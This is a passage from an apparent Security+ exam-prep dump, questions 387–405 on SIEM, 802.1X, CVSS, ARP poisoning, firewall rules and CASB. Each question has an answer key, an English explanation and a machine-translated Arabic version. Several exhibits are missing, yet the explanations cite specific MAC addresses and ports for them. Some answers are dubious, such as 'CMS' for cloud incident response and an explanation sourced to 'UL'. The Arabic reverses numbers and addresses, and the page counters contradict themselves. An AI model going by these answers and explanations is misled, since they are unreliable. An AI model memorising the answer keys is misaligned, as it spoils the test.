‫ و يقوم مسؤول أمني بتجميع المعلومات من جميع الأجهزة الموجودة على الشبكة المحلية من أجل الحصول على رؤية‬-387
‫ أي مما يلي هو أفضل حل لتحقيق هذا الهدف؟ سيم‬.‫أفضل لأنشطة المستعملين‬
‫ وهو حل يمكنه جمع سجلات الأمان والأحداث وربطها وتحليلها من أجهزة‬، ‫ تعني معلومات الأمان وإدارة الأحداث‬SIEM :‫تفسير‬
‫ رؤية أفضل لأنشطة المستخدم من خلال إنشاء التقارير والتنبيهات ولوحات‬SIEM ‫ يمكن أن توفر‬.‫مختلفة على الشبكة‬
‫ وتحسين‬، ‫ والامتثال للوائح‬، ‫ أيضا في اكتشاف الحوادث الأمنية والاستجابة لها‬SIEM ‫ يمكن أن تساعد‬.‫المعلومات والمقاييس‬
.‫الوضع الأمني‬
388. Which of the following Is the BEST reason to maintain a functional and effective asset management
policy that aids in ensuring the security of an organization?
A. To provide data to quantify risk based on the organization's systems
B. To keep all software and hardware fully patched for known vulnerabilities
C. To only allow approved, organization-owned devices onto the business network
D. To standardize by selecting one laptop model for all users in the organization
Answer: A
Explanation:
An effective asset management policy helps an organization understand and manage the systems,
hardware, and software it uses, and how they are used, including their vulnerabilities and risks. This
information is crucial for accurately identifying and assessing risks to the organization, and making
informed decisions about how to mitigate those risks. This is the best reason to maintain an effective
asset management policy.
‫أي مما يلي هو أفضل سبب للحفاظ على سياسة إدارة أصول وظيفية وفعالة تساعد في ضمان أمن المنظمة؟‬
‫لتوفير البيانات لتحديد المخاطر بناء على أنظمة المنظمة‬
‫ تساعد سياسة إدارة الأصول الفعالة المؤسسة على فهم وإدارة الأنظمة والأجهزة والبرامج التي تستخدمها وكيفية‬:‫تفسير‬
‫ هذه المعلومات ضرورية لتحديد وتقييم المخاطر التي تتعرض لها المنظمة‬.‫ بما في ذلك نقاط الضعف والمخاطر‬، ‫استخدامها‬
‫ هذا هو أفضل سبب للحفاظ على سياسة فعالة لإدارة‬.‫ واتخاذ قرارات مستنيرة حول كيفية التخفيف من تلك المخاطر‬، ‫بدقة‬
.‫الأصول‬
218 / 198
The safer , easier way to help you pass any IT exams.
389. While troubleshooting a service disruption on a mission-critical server, a technician discovered the
user account that was configured to run automated processes was disabled because the user's
password failed to meet password complexity requirements.
Which of the following would be the BEST solution to securely prevent future issues?
A. Using an administrator account to run the processes and disabling the account when it is not in use
B. Implementing a shared account the team can use to run automated processes
C. Configuring a service account to run the processes
D. Removing the password complexity requirements for the user account
Answer: C
Explanation:
A service account is a user account that is created specifically to run automated processes and services.
These accounts are typically not associated with an individual user, and are used for running background
services and scheduled tasks. By configuring a service account to run the automated processes, you
can ensure that the account will not be disabled due to password complexity requirements and other
user-related issues.
‫ اكتشف أحد الفنيين أن حساب المستخدم الذي تم‬،‫أثناء استكشاف أخطاء انقطاع الخدمة وإصلاحها على خادم المهام الحرجة‬
‫ أي‬.‫تكوينه لتشغيل العمليات التلقائية قد تم تعطيله بسبب فشل كلمة مرور المستخدم في تلبية متطلبات تعقيد كلمة المرور‬
‫مما يلي سيكون أفضل حل لمنع المشكلات المستقبلية بشكل آمن؟ تكوين حساب خدمة لتشغيل العمليات‬
‫ عادة لا ترتبط هذه‬.‫ حساب الخدمة هو حساب مستخدم تم إنشاؤه خصيصا لتشغيل العمليات والخدمات التلقائية‬:‫تفسير‬
‫ من خلال تكوين حساب خدمة لتشغيل‬.‫ وتستخدم لتشغيل خدمات الخلفية والمهام المجدولة‬،‫الحسابات بمستخدم فردي‬
‫ يمكنك التأكد من عدم تعطيل الحساب بسبب متطلبات تعقيد كلمة المرور والمشكلات الأخرى المتعلقة‬،‫العمليات التلقائية‬
.‫بالمستخدم‬
390. After multiple on-premises security solutions were migrated to the cloud, the incident response time
increased. The analysts are spending a long time trying to trace information on different cloud consoles
and correlating data in different formats.
Which of the following can be used to optimize the incident response time?
A. CASB
B. VPC
C. SWG
D. CMS
Answer: D
Explanation:
CMS (Cloud Management System) is a software or platform that allows an organization to manage and
monitor multiple cloud services and resources from a single interface or console. It can optimize the
incident response time by providing a centralized view and control of the cloud infrastructure and
applications, and enabling faster detection, analysis, and remediation of security incidents across
different cloud environments.
‫ يقضي المحللون وقتا طويلا في محاولة‬.‫ زاد وقت الاستجابة للحوادث‬،‫بعد ترحيل العديد من حلول الأمان المحلية إلى السحابة‬
‫ أي مما يلي يمكن استخدامه‬.‫تتبع المعلومات على وحدات التحكم السحابية المختلفة وربط البيانات بتنسيقات مختلفة‬
‫لتحسين وقت الاستجابة للحوادث؟سمس‬
‫ (نظام إدارة السحابة) هو برنامج أو نظام أساسي يسمح للمؤسسة بإدارة ومراقبة العديد من الخدمات والموارد‬CMS :‫تفسير‬
‫ يمكنه تحسين وقت الاستجابة للحوادث من خلال توفير عرض مركزي وتحكم في‬.‫السحابية من واجهة أو وحدة تحكم واحدة‬
‫ وتمكين اكتشاف الحوادث الأمنية وتحليلها ومعالجتها بشكل أسرع عبر بيئات السحابة‬، ‫البنية التحتية والتطبيقات السحابية‬
.‫المختلفة‬
219 / 198
The safer , easier way to help you pass any IT exams.
391. An organization wants to secure a LAN/WLAN so users can authenticate and transport data
securely. The solution needs to prevent on-path attacks and evil twin attacks.
Which of the following will best meet the organization's need?
A. MFA
B. 802.1X
C. WPA2
D. TACACS
Answer: B
Explanation:
802.1X is a standard for network access control that provides authentication and encryption for devices
that connect to a LAN/WLAN. 802.1X uses the Extensible Authentication Protocol (EAP) to exchange
authentication messages between a supplicant (the device requesting access), an authenticator (the
device granting access), and an authentication server (the device verifying credentials). 802.1X can
prevent on-path attacks and evil twin attacks by requiring users to provide valid credentials before
accessing the network and encrypting the data transmitted over the network. On-path attacks are attacks
that involve intercepting or modifying network traffic between two endpoints. An on-path attacker can
eavesdrop on sensitive information, alter or inject malicious data, or redirect traffic to malicious
destinations. On-path attacks are frequently perpetrated over WiFi networks1.
Evil twin attacks are attacks that involve setting up a fake WiFi access point that mimics a legitimate one.
An evil twin attacker can trick users into connecting to the fake network and then monitor or manipulate
their online activity. Evil twin attacks are more common on public WiFi networks that are unsecured and
leave personal data vulnerable23.
‫ يحتاج الحل إلى منع‬.‫ حتى يتمكن المستخدمون من مصادقة البيانات ونقلها بأمان‬WLAN/LAN ‫تريد المؤسسة تأمين شبكة‬
‫ أي مما يلي سيلبي احتياجات المنظمة على أفضل وجه؟‬.‫الهجمات على الطريق والهجمات المزدوجة الشريرة‬
.WLAN / LAN ‫ هو معيار للتحكم في الوصول إلى الشبكة يوفر المصادقة والتشفير للأجهزة التي تتصل بشبكة‬X802.1 :‫تفسير‬
‫) لتبادل رسائل المصادقة بين المتوسل (الجهاز الذي يطلب‬EAP( ‫ بروتوكول المصادقة القابل للتوسيع‬X802.1 ‫يستخدم‬
‫ يمكن ل‬.)‫الوصول) والمصادقة (الجهاز الذي يمنح حق الوصول) وخادم المصادقة (الجهاز الذي يتحقق من بيانات الاعتماد‬
‫ منع الهجمات على المسار والهجمات المزدوجة الشريرة من خلال مطالبة المستخدمين بتقديم بيانات اعتماد صالحة‬X802.1
‫ الهجمات على المسار هي هجمات تتضمن اعتراض أو تعديل‬.‫قبل الوصول إلى الشبكة وتشفير البيانات المرسلة عبر الشبكة‬
‫ يمكن للمهاجم على المسار التنصت على المعلومات الحساسة أو تغيير البيانات الضارة‬.‫حركة مرور الشبكة بين نقطتي نهاية‬
Evil ‫ هجمات‬.WiFi1 ‫ كثيرا ما ترتكب الهجمات على المسار عبر شبكات‬.‫أو حقنها أو إعادة توجيه حركة المرور إلى وجهات ضارة‬
‫ يمكن للمهاجم المزدوج الشرير خداع‬.‫ مزيفة تحاكي نقطة وصول شرعية‬WiFi ‫ هي هجمات تتضمن إعداد نقطة وصول‬Twin
‫ أكثر شيوعا على‬Twin Evil ‫ تعد هجمات‬.‫المستخدمين للاتصال بالشبكة المزيفة ثم مراقبة نشاطهم عبر الإنترنت أو التلاعب به‬
.23‫ العامة غير الآمنة وتترك البيانات الشخصية عرضة للخطر‬WiFi ‫شبكات‬
220 / 198
The safer , easier way to help you pass any IT exams.
392.A security analyst is looking for a solution to help communicate to the leadership team the seventy
levels of the organization's vulnerabilities. Which of the following would best meet this need?
A. CVE
B. SIEM
C. SOAR
D. CVSS
Answer: D
Explanation:
CVSS (Common Vulnerability Scoring System) is a framework and a metric that provides a standardized
and consistent way of assessing and communicating the severity levels of vulnerabilities. It assigns a
numerical score and a vector string to each vulnerability based on various factors, such as exploitability,
impact, scope, etc. It can help communicate to the leadership team the severity levels of the
organization’s vulnerabilities by providing a quantitative and qualitative measure of the risks and the
potential impacts.
‫ أي مما‬.‫ يبحث محلل أمني عن حل للمساعدة في إبلاغ فريق القيادة بالمستويات السبعين لنقاط الضعف في المنظمة‬-392
CVSS‫يلي يلبي هذه الحاجة على أفضل وجه؟‬
‫ (نظام تسجيل نقاط الضعف المشترك) هو إطار عمل ومقياس يوفر طريقة موحدة ومتسقة لتقييم مستويات‬CVSS :‫التفسير‬
‫ مثل‬، ‫ يقوم بتعيين درجة عددية وسلسلة متجهة لكل ثغرة أمنية بناء على عوامل مختلفة‬.‫خطورة نقاط الضعف والإبلاغ عنها‬
‫ يمكن أن يساعد في إبلاغ فريق القيادة بمستويات خطورة نقاط الضعف في‬.‫قابلية الاستغلال والتأثير والنطاق وما إلى ذلك‬
.‫المنظمة من خلال توفير مقياس كمي ونوعي للمخاطر والآثار المحتملة‬
393.A company that provides an online streaming service made its customers' personal data including
names and email addresses publicly available in a cloud storage service. As a result, the company
experienced an increase m the number of requests to delete user accounts.
Which of the following best describes the consequence of tins data disclosure?
A. Regulatory tines
B. Reputation damage
C. Increased insurance costs
D. Financial loss
Answer: B
Explanation:
Reputation damage is the loss of trust or credibility that a company suffers when its customers’ personal
data is exposed or breached. This can lead to customer dissatisfaction, loss of loyalty, and requests to
delete user accounts.
‫ أتاحت شركة توفر خدمة البث المباشر البيانات الشخصية لعملائها بما في ذلك الأسماء وعناوين البريد الإلكتروني‬-393
‫ أي مما‬.‫ شهدت الشركة زيادة في عدد طلبات حذف حسابات المستخدمين‬، ‫ نتيجة لذلك‬.‫للجمهور في خدمة تخزين سحابية‬
‫يلي يصف بشكل أفضل نتيجة الكشف عن بيانات العلب؟ الإضرار بالسمعة‬
‫ الضرر الذي يلحق بالسمعة هو فقدان الثقة أو المصداقية الذي تعاني منه الشركة عندما يتم الكشف عن البيانات‬:‫تفسير‬
.‫ يمكن أن يؤدي ذلك إلى استياء العملاء وفقدان الولاء وطلبات حذف حسابات المستخدمين‬.‫الشخصية لعملائها أو اختراقها‬
221 / 198
The safer , easier way to help you pass any IT exams.
394.A user reports constant lag and performance issues with the wireless network when working at a
local coffee shop A security analyst walks the user through an installation of Wireshark and gets a fiveminute pcap to analyze.
The analyst observes the following output:
Which of the following attacks does the analyst most likely see in this packet capture?
A. Session replay
B. Evil twin
C. Bluejacking
D. ARP poisoning
Answer: B
Explanation:
An evil twin is a type of wireless network attack that involves setting up a rogue access point that mimics
a legitimate one. It can trick users into connecting to the rogue access point instead of the real one, and
then intercept or modify their traffic, steal their credentials, launch phishing pages, etc. In this packet
capture, the analyst can see that there are two access points with the same SSID (CoffeeShop) but
different MAC addresses (00:0c:41:82:9c:4f and 00:0c:41:82:9c:4e). This indicates that one of them is an
evil twin that is trying to impersonate the other one.
‫ يبلغ أحد المستخدمين عن تأخر مستمر ومشاكل في الأداء في الشبكة اللاسلكية عند العمل في مقهى محلي يقوم محلل‬-394
‫ أي‬:‫ يلاحظ المحلل الناتج التالي‬.‫ مدته خمس دقائق لتحليله‬pcap ‫ ويحصل على‬Wireshark ‫أمني بإرشاد المستخدم خلال تثبيت‬
‫من الهجمات التالية يراها المحلل على الأرجح في التقاط الحزمة هذا؟ التوأم الشرير‬
‫ التوأم الشرير هو نوع من هجمات الشبكة اللاسلكية التي تتضمن إعداد نقطة وصول مارقة تحاكي نقطة وصول‬:‫تفسير‬
‫ ثم اعتراض أو تعديل حركة المرور‬، ‫ يمكنه خداع المستخدمين للاتصال بنقطة الوصول المارقة بدلا من النقطة الحقيقية‬.‫شرعية‬
، ‫ في التقاط الحزمة هذا‬.‫ وما إلى ذلك‬، ‫ وإطلاق صفحات التصيد الاحتيالي‬، ‫ وسرقة بيانات الاعتماد الخاصة بهم‬، ‫الخاصة بهم‬
:c9 :82 :41 :c0 :00( ‫ مختلفة‬MAC ‫) ولكن عناوين‬CoffeeShop( SSID ‫يمكن للمحلل أن يرى أن هناك نقطتي وصول لهما نفس‬
.‫ هذا يشير إلى أن أحدهما هو توأم شرير يحاول انتحال شخصية الآخر‬.)e4 :c9 :82 :41 :c0 :00 ‫ و‬f4
222 / 198
The safer , easier way to help you pass any IT exams.
395.Which of the following should customers who are involved with Ul developer agreements be
concerned with when considering the use of these products on highly sensitive projects?
A. Weak configurations
B. Integration activities
C. Unsecure user accounts
D. Outsourced code development
Answer: A
Explanation:
Customers who are involved with Ul developer agreements should be concerned with weak
configurations when considering the use of these products on highly sensitive projects. Weak
configurations can lead to security vulnerabilities, which can be exploited by malicious actors. It is
important to ensure that all configurations are secure and up-to-date in order to protect sensitive data.
Source: UL
‫ عند النظر في استخدام هذه المنتجات في‬Ul ‫أي مما يلي ينبغي أن يهتم به العملاء المشاركون في اتفاقات مطوري‬.395
‫مشاريع حساسة للغاية؟ تكوينات ضعيفة‬
‫ بالتكوينات الضعيفة عند التفكير في استخدام هذه المنتجات‬Ul ‫ يجب أن يهتم العملاء المشاركون في اتفاقيات مطوري‬:‫تفسير‬
‫ من‬.‫ يمكن أن تؤدي التكوينات الضعيفة إلى ثغرات أمنية يمكن استغلالها من قبل الجهات الخبيثة‬.‫في مشاريع حساسة للغاية‬
‫ يو ال‬:‫ المصدر‬.‫المهم التأكد من أن جميع التكوينات آمنة ومحدثة من أجل حماية البيانات الحساسة‬
223 / 198
The safer , easier way to help you pass any IT exams.
396.A security administrator examines the ARP table of an access switch and sees the following output:
Which of the following is a potential threat that is occurring on this access switch?
A. DDoSonFa02 port
B. MAG flooding on Fa0/2 port
C. ARP poisoning on Fa0/1 port
D. DNS poisoning on port Fa0/1
Answer: C
Explanation:
ARP poisoning is a type of attack that exploits the ARP protocol to associate a malicious MAC address
with a legitimate IP address on a network1. This allows the attacker to intercept, modify or drop traffic
between the victim and other hosts on the same network. In this case, the ARP table of the access
switch shows that the same MAC address (00-0c-29-58-35-3b) is associated with two different IP
addresses (192.168.1.100 and 192.168.1.101) on port Fa0/12. This indicates that an attacker has
poisoned the ARP table to redirect traffic intended for 192.168.1.100 to their own device with MAC
address 00-0c-29-58-35-3b. The other options are not related to this scenario. DDoS is a type of attack
that overwhelms a target with excessive traffic from multiple sources3. MAC flooding is a type of attack
that floods a switch with fake MAC addresses to exhaust its MAC table and force it to operate as a hub4.
DNS poisoning is a type of attack that corrupts the DNS cache with fake entries to redirect users to
malicious websites.
‫ أي مما يلي يمثل تهديدا محتملا يحدث على‬:‫ لمفتاح تبديل الوصول ويرى الإخراج التالي‬ARP ‫يفحص مسؤول الأمن جدول‬.396
1 / Fa0 ‫ على منفذ‬ARP ‫مفتاح الوصول هذا؟ تسمم‬
‫ يسمح‬.1‫ شرعي على الشبكة‬IP ‫ ضار بعنوان‬MAC ‫ لربط عنوان‬ARP ‫ هو نوع من الهجوم يستغل بروتوكول‬ARP ‫ تسمم‬:‫تفسير‬
، ‫ في هذه الحالة‬.‫هذا للمهاجم باعتراض أو تعديل أو إسقاط حركة المرور بين الضحية والمضيفين الآخرين على نفس الشبكة‬
‫ و‬192.168.1.100( ‫ مختلفين‬IP ‫) مرتبط بعنواني‬b3-35-58-29-c0-00( MAC ‫ لمفتاح الوصول أن نفس عنوان‬ARP ‫يوضح جدول‬
‫ لإعادة توجيه حركة المرور المخصصة‬ARP ‫ يشير هذا إلى أن أحد المهاجمين قد سمم جدول‬.12 / Fa0 ‫) على المنفذ‬192.168.1.101
‫ هو نوع‬DDoS .‫ لا ترتبط الخيارات الأخرى بهذا السيناريو‬.b3-35-58-29-c0-00 MAC ‫ إلى أجهزته الخاصة بعنوان‬192.168.1.100 ‫ل‬
‫ هو نوع من الهجوم الذي يغمر مفتاحا‬MAC ‫ فيضان‬.3 ‫من الهجوم يطغى على الهدف بحركة مرور مفرطة من مصادر متعددة‬
‫ هو نوع من الهجوم يفسد‬DNS ‫ تسمم‬.4 ‫ الخاص به وإجباره على العمل كمحور‬MAC ‫ مزيفة لاستنفاد جدول‬MAC ‫بعناوين‬
.‫ذاكرة التخزين المؤقت لنظام أسماء النطاقات بإدخالات مزيفة لإعادة توجيه المستخدمين إلى مواقع الويب الضارة‬
224 / 198
The safer , easier way to help you pass any IT exams.
397.HOTSPOT
Select the appropriate attack and remediation from each drop-down list to label the corresponding attack
with its remediation.
INSTRUCTIONS
Not all attacks and remediation actions will be used.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All
button.
‫هوت سبوت‬.397
.‫حدد الهجوم والمعالجة المناسبين من كل قائمة منسدلة لتسمية الهجوم المقابل بمعالجته‬
‫ فالرجاء النقر فوق‬، ‫ إذا كنت ترغب في أي وقت في إعادة الحالة الأولية للمحاكاة‬.‫ لن يتم استخدام جميع الهجمات وإجراءات المعالجة‬: ‫تعليمات‬
.‫إعادة تعيين الكل زر‬
225 / 198
The safer , easier way to help you pass any IT exams.
Answer:
226 / 198
The safer , easier way to help you pass any IT exams.
Explanation:
Web serverBotnet Enable DDoS protectionUser RAT Implement a host-based IPS Database server
Worm Change the default application passwordExecutive KeyloggerDisable vulnerable
servicesApplication Backdoor Implement 2FA using push notification
\ ‫تفسير‬
‫خادم الويب تمكين حماية المستخدم تنفيذ خادم قاعدة بيانات المستند إلى المضيف دودة تغيير كلمة مرور التطبيق‬
‫الافتراضية كلوغر التنفيذيتعطيل الخدمات الضعيفةتطبيق الباب الخلفي تنفيذ المصادقة الثنائية باستخدام إعلام الدفع‬
A screenshot of a computer program
Description automatically generated with low confidence
‫لقطة شاشة لبرنامج كمبيوتر‬
‫الوصف الذي يتم إنشاؤه تلقائيا بثقة منخفضة‬
227 / 198
The safer , easier way to help you pass any IT exams.
398. An engineer is using scripting to deploy a network in a cloud environment.
Which the following describes this scenario?
A. SDLC
B. VLAN
C. SDN
D. SDV
Answer: C
Explanation:
SDN stands for software-defined networking, which is an approach to networking that uses softwarebased controllers or application programming interfaces (APIs) to communicate with underlying
hardware infrastructure and direct traffic on a network. SDN decouples the network control plane from
the data plane, enabling centralized management and programmability of network resources. SDN can
help an engineer use scripting to deploy a network in a cloud environment by allowing them to define
and automate network policies, configurations, and services through software commands.
‫ ما الآتي الذي يصف هذا السيناريو؟ سدن‬.‫يستخدم مهندس البرمجة النصية لنشر شبكة في بيئة سحابية‬
‫ وهي نهج للشبكات يستخدم وحدات التحكم القائمة على البرامج أو واجهات‬، ‫ تعني الشبكات المعرفة بالبرمجيات‬SDN :‫تفسير‬
‫ بفصل‬SDN ‫ تقوم‬.‫) للتواصل مع البنية التحتية للأجهزة الأساسية وحركة المرور المباشرة على الشبكة‬APIs( ‫برمجة التطبيقات‬
SDN ‫ يمكن أن تساعد‬.‫ مما يتيح الإدارة المركزية وقابلية برمجة موارد الشبكة‬، ‫مستوى التحكم في الشبكة عن مستوى البيانات‬
‫المهندس على استخدام البرمجة النصية لنشر شبكة في بيئة سحابية من خلال السماح له بتحديد وأتمتة سياسات الشبكة‬
.‫وتكويناتها وخدماتها من خلال أوامر البرامج‬
399. During a security incident the security operations team identified sustained network traffic from a
malicious IP address: 10.1.4.9 A security analyst is creating an inbound firewall rule to block the IP
address from accessing the organization's network.
Which of the following fulfills this request?
A. access-list inbound deny ip source 0.0.0.0/0 destination 10.1.4.9/32
B. access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0
C. access-list inbound permit ip source 10.1.4.9/32 destination 0.0.0.0/0
D. access-list inbound permit ip source 0.0.0.0/0 destination 10.1.4.9/32
Answer: B
Explanation:
This command creates an inbound access list that denies any IP traffic from the source IP address of
10.1.4.9/32 to any destination IP address (0.0.0.0/0). It blocks the originating source of malicious traffic
from accessing the organization’s network.
‫ يقوم محلل الأمان‬10.1.4.9 :‫ ضار‬IP ‫ حدد فريق العمليات الأمنية حركة مرور الشبكة المستمرة من عنوان‬،‫أثناء وقوع حادث أمني‬
‫ أي مما يلي يلبي هذا الطلب؟‬.‫ من الوصول إلى شبكة المؤسسة‬IP ‫بإنشاء قاعدة جدار حماية واردة لمنع عنوان‬
0/0.0.0.0 ‫ الوجهة‬32/10.1.4.9 IP ‫قائمة الوصول الواردة رفض مصدر‬
‫ وجهة‬IP ‫ إلى أي عنوان‬32/10.1.4.9 ‫ المصدر‬IP ‫ من عنوان‬IP ‫ ينشئ هذا الأمر قائمة وصول واردة ترفض أي حركة مرور‬:‫تفسير‬
.‫ يمنع المصدر الأصلي لحركة المرور الضارة من الوصول إلى شبكة المؤسسة‬.)0/0.0.0.0(
228 / 198
The safer , easier way to help you pass any IT exams.
400.A security analyst is taking part in an evaluation process that analyzes and categorizes threat actors
Of real-world events in order to improve the incident response team's process.
Which Of the following is the analyst most likely participating in?
A. MITRE ATT&CK
B. Walk-through
C. Red team
D. Purple team-I
E. TAXI
Answer: A
Explanation:
MITRE ATT&CK is a knowledge base and framework that analyzes and categorizes threat actors and
real-world events based on their tactics, techniques and procedures. It can help improve the incident
response team’s process by providing a common language and reference for identifying, understanding
and mitigating threats
‫ ويشارك محلل أمني في عملية تقييم تحلل وتصنف الجهات الفاعلة في التهديد لأحداث العالم الحقيقي من أجل تحسين‬-400
‫ أي مما يلي يشارك فيه المحلل على الأرجح؟ ميتري أت اند سي كيه‬.‫عملية فريق الاستجابة للحوادث‬
‫ هي قاعدة معرفية وإطار عمل يحلل ويصنف الجهات الفاعلة في التهديد وأحداث العالم الحقيقي‬CK&ATT MITRE :‫تفسير‬
‫ يمكن أن يساعد في تحسين عملية فريق الاستجابة للحوادث من خلال توفير لغة‬.‫بناء على تكتيكاتهم وتقنياتهم وإجراءاتهم‬
‫ومرجع مشترك لتحديد التهديدات وفهمها والتخفيف من حدتها‬
229 / 198
The safer , easier way to help you pass any IT exams.
401.A network administrator needs to determine Ihe sequence of a server farm's logs.
Which of the following should the administrator consider? (Select TWO).
A. Chain of custody
B. Tags
C. Reports
D. Time stamps
E. Hash values
F. Time offset
Answer: D, F
Explanation:
A server farm’s logs are records of events that occur on a group of servers that provide the same service
or function. Logs can contain information such as date, time, source, destination, message, error code,
and severity level. Logs can help administrators monitor the performance, security, and availability of the
servers and troubleshoot any issues.
To determine the sequence of a server farm’s logs, the administrator should consider the following
factors:
✑ Time stamps: Time stamps are indicators of when an event occurred on a server. Time stamps can
help administrators sort and correlate events across different servers based on chronological order.
However, time stamps alone may not be sufficient to determine the sequence of events if the servers
have different time zones or clock settings.
✑ Time offset: Time offset is the difference between the local time of a server and a reference time,
such as Coordinated Universal Time (UTC) or Greenwich Mean Time (GMT). Time offset can help
administrators adjust and synchronize the time stamps of different servers to a common reference time
and eliminate any discrepancies caused by time zones or clock settings.
‫ أي مما يلي يجب على المسؤول مراعاته؟ (اختر‬.‫ لسجلات مزرعة الخوادم‬Ihe ‫يحتاج مسؤول الشبكة إلى تحديد تسلسل‬.401
‫ الطوابع الزمنية _ إزاحة الوقت‬.)‫اثنين‬
‫ سجلات مزرعة الخوادم هي سجلات للأحداث التي تحدث على مجموعة من الخوادم التي توفر نفس الخدمة أو‬:‫تفسير‬
‫ يمكن أن تحتوي السجلات على معلومات مثل التاريخ والوقت والمصدر والوجهة والرسالة ورمز الخطأ ومستوى‬.‫الوظيفة‬
.‫ يمكن أن تساعد السجلات المسؤولين في مراقبة أداء الخوادم وأمانها وتوافرها واستكشاف أي مشكلات وإصلاحها‬.‫الخطورة‬
‫ الطوابع الزمنية هي‬:‫ ✑ الطوابع الزمنية‬:‫ يجب على المسؤول مراعاة العوامل التالية‬،‫لتحديد تسلسل سجلات مزرعة الخوادم‬
‫ يمكن الطوابع الزمنية ساعد المسؤولين على فرز الأحداث وربطها عبر خوادم‬.‫مؤشرات على وقت وقوع حدث على الخادم‬
‫ قد لا تكون الطوابع الزمنية وحدها كافية لتحديد تسلسل الأحداث إذا كانت‬، ‫ ومع ذلك‬.‫مختلفة استنادا إلى الترتيب الزمني‬
‫ إزاحة الوقت هي الفرق بين التوقيت المحلي للخادم‬:‫ ✑ إزاحة الوقت‬.‫الخوادم لديك مناطق زمنية أو إعدادات ساعة مختلفة‬
‫ يمكن أن يساعد إزاحة الوقت المسؤولين‬.)GMT( ‫) أو توقيت غرينتش‬UTC( ‫ مثل التوقيت العالمي المنسق‬،‫والوقت المرجعي‬
‫على ضبط ومزامنة الطوابع الزمنية للخوادم المختلفة مع وقت مرجعي مشترك والقضاء على أي تناقضات ناتجة عن‬
.‫المناطق الزمنية أو إعدادات الساعة‬
230 / 198
The safer , easier way to help you pass any IT exams.
402.Which of the following describes business units that purchase and implement scripting software
without approval from an organization's technology Support staff?
A. Shadow IT
B. Hacktivist
C. Insider threat
D. script kiddie
Answer: A
Explanation:
shadow IT is the use of IT-related hardware or software by a department or individual without the
knowledge or approval of the IT or security group within the organization12. Shadow IT can encompass
cloud services, software, and hardware. The main area of concern today is the rapid adoption of cloudbased services1.
According to one source3, shadow IT helps you know and identify which apps are being used and what
your risk level is. 80% of employees use non-sanctioned apps that no one has reviewed, and may not be
compliant with your security and compliance policies.
‫أي مما يلي يصف وحدات الأعمال التي تشتري برامج البرمجة النصية وتنفذها دون موافقة موظفي الدعم التكنولوجي للمؤسسة؟ شادو آي‬.402
‫تي‬
‫ هو استخدام الأجهزة أو البرامج المتعلقة بتكنولوجيا المعلومات من قبل قسم أو فرد دون علم أو موافقة مجموعة تكنولوجيا‬IT shadow :‫تفسير‬
‫ مجال القلق الرئيسي اليوم هو الاعتماد‬.‫ الخدمات السحابية والبرامج والأجهزة‬IT Shadow ‫ يمكن أن تشمل‬.12‫المعلومات أو الأمان داخل المؤسسة‬
‫ على معرفة وتحديد التطبيقات التي يتم استخدامها ومستوى‬IT Shadow ‫ تساعدك‬، 3‫ وفقا لأحد المصادر‬.1‫السريع للخدمات المستندة إلى السحابة‬
‫ وقد لا تكون متوافقة مع سياسات الأمان والامتثال‬،‫ من الموظفين تطبيقات غير خاضعة للعقوبات لم يراجعها أحد‬٪80 ‫ يستخدم‬.‫المخاطرة لديك‬
.‫الخاصة بك‬
403.A company is moving its retail website to a public cloud provider. The company wants to tokenize
audit card data but not allow the cloud provider to see the stored credit card information.
Which of the following would BEST meet these objectives?
A. WAF
B. CASB
C. VPN
D. TLS
Answer: B
Explanation:
CASB stands for cloud access security broker, which is a software tool or service that acts as an
intermediary between users and cloud service providers. CASB can help protect data stored in cloud
services by enforcing security policies and controls such as encryption, tokenization, authentication,
authorization, logging, auditing, and threat detection. Tokenization is a process that replaces sensitive
data with non-sensitive substitutes called tokens that have no intrinsic value. Tokenization can help
prevent data leakage by ensuring that only authorized users can access the original data using a
tokenization system.
‫ تريد الشركة ترميز بيانات بطاقة التدقيق ولكن لا‬.‫تقوم شركة بنقل موقعها الإلكتروني للبيع بالتجزئة إلى مزود سحابة عامة‬.403
‫ أي مما يلي يحقق هذه الأهداف على أفضل وجه؟ كاسب‬.‫تسمح لمزود السحابة برؤية معلومات بطاقة الائتمان المخزنة‬
‫ وهي أداة برمجية أو خدمة تعمل كوسيط بين المستخدمين وموفري‬، ‫ تعني وسيط أمان الوصول إلى السحابة‬CASB :‫تفسير‬
‫ في حماية البيانات المخزنة في الخدمات السحابية من خلال فرض سياسات وعناصر‬CASB ‫ يمكن أن يساعد‬.‫الخدمات السحابية‬
‫ الترميز هو عملية تستبدل‬.‫تحكم الأمان مثل التشفير والترميز والمصادقة والتخويل والتسجيل والتدقيق واكتشاف التهديدات‬
‫ يمكن أن يساعد الترميز في منع‬.‫البيانات الحساسة ببدائل غير حساسة تسمى الرموز المميزة التي ليس لها قيمة جوهرية‬
‫تسرب البيانات من خلال التأكد من أن المستخدمين المصرح لهم فقط يمكنهم الوصول إلى البيانات الأصلية باستخدام نظام‬
. ‫الترميز‬
231 / 198
The safer , easier way to help you pass any IT exams.
404.A security administrator needs to block a TCP connection using the corporate firewall, Because this
connection is potentially a threat. the administrator not want to back an RST.
Which of the following actions in rule would work best?
A. Drop
B. Reject
C. Log alert
D. Permit
Answer: A
Explanation:
the difference between drop and reject in firewall is that the drop target sends nothing to the source,
while the reject target sends a reject response to the source. This can affect how the source handles the
connection attempt and how fast the port scanning is. In this context, a human might say that the best
action to block a TCP connection using the corporate firewall is A. Drop, because it does not send back
an RST packet and it may slow down the port scanning and protect against DoS attacks.
.‫ لأن هذا الاتصال يحتمل أن يشكل تهديدا‬،‫يحتاج مسؤول الأمان إلى حظر اتصال تي سي بي باستخدام جدار حماية الشركة‬.404
‫ أي الإجراءات التالية في القاعدة سيعمل بشكل أفضل؟ قطرة‬.‫لا يريد المسؤول دعم‬
‫ بينما يرسل هدف‬، ‫ الفرق بين الإسقاط والرفض في جدار الحماية هو أن هدف الإسقاط لا يرسل شيئا إلى المصدر‬:‫تفسير‬
‫ يمكن أن يؤثر ذلك على كيفية معالجة المصدر لمحاولة الاتصال ومدى سرعة فحص‬.‫الرفض استجابة رفض إلى المصدر‬
‫ لأنه لا‬، Drop .A ‫ باستخدام جدار حماية الشركة هو‬TCP ‫ قد يقول الإنسان أن أفضل إجراء لحظر اتصال‬، ‫ في هذا السياق‬.‫المنفذ‬
.DoS ‫ مرة أخرى وقد يبطئ فحص المنفذ ويحمي من هجمات‬RST ‫يرسل حزمة‬
405.A security analyst is investigating what appears to be unauthorized access to a corporate web
application. The security analyst reviews the web server logs and finds the following entries:
Which of the following password attacks is taking place?
A. Dictionary
